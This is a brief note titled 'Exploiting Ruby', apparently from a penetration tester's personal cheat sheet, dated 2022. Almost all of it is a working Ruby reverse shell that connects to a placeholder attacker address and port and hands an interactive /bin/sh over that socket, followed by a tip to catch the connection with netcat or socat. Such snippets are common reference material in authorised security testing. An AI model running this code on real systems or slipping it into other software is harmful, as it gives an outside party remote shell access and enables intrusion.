Exploiting Ruby
- author:: Nathan Acks
- date:: 2022-07-11
A simple reverse shell:
require "socket"
attacker_ip = "10.0.0.1"
attacker_port = 1234
f = TCPSocket.open(attacker_ip, attacker_port).to_i
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d", f, f, f)
Catch it with netcat or socat.